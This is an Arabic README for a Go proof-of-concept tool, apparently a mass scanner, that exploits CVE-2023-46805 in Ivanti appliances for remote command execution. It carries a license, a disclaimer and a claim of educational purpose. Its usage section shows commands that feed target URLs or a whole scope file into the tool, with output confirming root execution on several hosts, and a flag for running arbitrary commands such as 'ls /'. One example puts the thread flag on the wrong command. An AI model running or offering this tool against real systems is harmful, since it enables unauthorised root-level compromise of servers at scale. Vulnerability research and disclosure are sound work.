
CVE-2023-46805 Ivanti POC RCE - ماسح فائق السرعة.
العنوان: إثبات المفهوم لـ CVE-2023-46805 - للاستخدام التعليمي فقط
الترخيص: هذا العمل مرخص بموجب رخصة المشاع الإبداعي الدولية 4.0 (CC BY 4.0). يمكنك مشاركة هذا العمل ونسخه وتوزيعه ونقله بحرية، وتكييفه أو استخدامه لأغراض أخرى، بشرط نسبة التأليف بشكل مناسب.
إخلاء مسؤولية: يتم توفير إثبات المفهوم (PoC) هذا لأغراض تعليمية وبحوث الأمن السيبراني فقط. لن يكون المؤلف أو المؤسسة المنتسبة أو أي طرف آخر مشارك في إنشاء هذا المحتوى أو إنتاجه أو تسليمه مسؤولاً عن أي أضرار، بما في ذلك على سبيل المثال لا الحصر، الأضرار المباشرة أو غير المباشرة أو العرضية أو الخاصة أو التبعية أو العقوبات الناشئة عن استخدام أو عدم القدرة على استخدام هذا المحتوى.
الهدف التعليمي: يهدف إثبات المفهوم هذا إلى مساعدة مجتمع الأمن السيبراني في فهم وتخفيف الثغرة الأمنية المعروفة باسم CVE-2023-46805. لا ينبغي استخدامه في بيئة إنتاج أو لأنشطة ضارة.
وصف الثغرة الأمنية: Ivanti RCE
تفاصيل إثبات المفهوم:
Usage of ./CVE-Ivanti:
-cmd string
The command to replace 'id' in the payload (default "id")
-t int
Number of concurrent threads (default 5)
go build
echo "https://1.2.3.4" | ./CVE-Ivanti
https://1.2.3.4 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
cat myscope.txt -t 5 | ./CVE-Ivanti
https://ssl1.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
https://ssl3.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
echo "https://1.2.3.4" | ./CVE-Ivanti -cmd 'ls /'